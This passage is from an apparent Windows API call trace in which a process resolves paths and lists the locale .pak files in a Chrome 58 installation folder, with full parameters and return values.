(x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak", lpFilePart=0x0) returned 0x4d [0114.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak", lpFilePart=0x0) returned 0x4d [0114.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak", lpFilePart=0x0) returned 0x50 [0114.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak", lpFilePart=0x0) returned 0x50 [0114.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0114.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", lpFilePart=0x0) returned 0x46 [0114.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", lpFilePart=0x0) returned 0x47 [0114.296] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d86fec0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0114.297] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d86fec0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.297] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeae1a98, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x6f4e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="am.pak", cAlternateFileName="")) returned 1 [0114.297] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeb0b2b9, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x6df65, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar.pak", cAlternateFileName="")) returned 1 [0114.297] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeb34ada, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x84ca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg.pak", cAlternateFileName="")) returned 1 [0114.297] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeb6582e, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xa9727, dwReserved0=0x0, dwReserved1=0x0, cFileName="bn.pak", cAlternateFileName="")) returned 1 [0114.298] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeb91760, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5082b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca.pak", cAlternateFileName="")) returned 1 [0114.298] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfebbaf81, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51809, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs.pak", cAlternateFileName="")) returned 1 [0114.298] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfebdf980, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x494f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="da.pak", cAlternateFileName="")) returned 1 [0114.298] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec06a90, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x463fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="de.pak", cAlternateFileName="")) returned 1 [0114.298] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec329c2, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x8f814, dwReserved0=0x0, dwReserved1=0x0, cFileName="el.pak", cAlternateFileName="")) returned 1 [0114.298] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec63716, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4244f, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB.pak", cAlternateFileName="")) returned 1 [0114.298] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec796af, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x42442, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US.pak", cAlternateFileName="")) returned 1 [0114.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec9928c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4fca5, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-419.pak", cAlternateFileName="")) returned 1 [0114.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfecc51be, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x512b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="es.pak", cAlternateFileName="")) returned 1 [0114.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfecf10f0, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x469ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="et.pak", cAlternateFileName="")) returned 1 [0114.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfed1f733, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x72286, dwReserved0=0x0, dwReserved1=0x0, cFileName="fa.pak", cAlternateFileName="")) returned 1 [0114.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfed44132, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4b6ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi.pak", cAlternateFileName="")) returned 1 [0114.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfed72775, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51c09, dwReserved0=0x0, dwReserved1=0x0, cFileName="fil.pak", cAlternateFileName="")) returned 1 [0114.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfed97174, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x55a6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr.pak", cAlternateFileName="")) returned 1 [0114.300] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfedd1b0c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x9f1a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gu.pak", cAlternateFileName="")) returned 1 [0114.300] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfee07682, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5df23, dwReserved0=0x0, dwReserved1=0x0, cFileName="he.pak", cAlternateFileName="")) returned 1 [0114.300] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfee383d6, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xa3281, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi.pak", cAlternateFileName="")) returned 1 [0114.300] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfee6df4c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4bc57, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr.pak", cAlternateFileName="")) returned 1 [0114.300] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfee9505c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x54a87, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu.pak", cAlternateFileName="")) returned 1 [0114.300] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeebe87d, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="id.pak", cAlternateFileName="")) returned 1 [0114.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeee598d, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4e532, dwReserved0=0x0, dwReserved1=0x0, cFileName="it.pak", cAlternateFileName="")) returned 1 [0114.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfef118bf, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5f8fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja.pak", cAlternateFileName="")) returned 1 [0114.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfef3ff02, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xb6beb, dwReserved0=0x0, dwReserved1=0x0, cFileName="kn.pak", cAlternateFileName="")) returned 1 [0114.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfef67012, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x50b94, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko.pak", cAlternateFileName="")) returned 1 [0114.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfef95655, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51c11, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt.pak", cAlternateFileName="")) returned 1 [0114.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfefd4e0f, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51fd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv.pak", cAlternateFileName="")) returned 1 [0114.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeffe630, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xccccc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ml.pak", cAlternateFileName="")) returned 1 [0114.302] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff0341a6, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xa1beb, dwReserved0=0x0, dwReserved1=0x0, cFileName="mr.pak", cAlternateFileName="")) returned 1 [0114.302] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff03ddea, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x3e2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ms.pak", cAlternateFileName="")) returned 1 [0114.302] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff069d1c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x487e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb.pak", cAlternateFileName="")) returned 1 [0114.302] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff08c00a, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4d450, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl.pak", cAlternateFileName="")) returned 1 [0114.302] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff0b7f3c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x500e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl.pak", cAlternateFileName="")) returned 1 [0114.302] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff0e3e6e, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4e63d, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR.pak", cAlternateFileName="")) returned 1 [0114.302] FindNextFileW (in: hFindFile=0x4d1060, 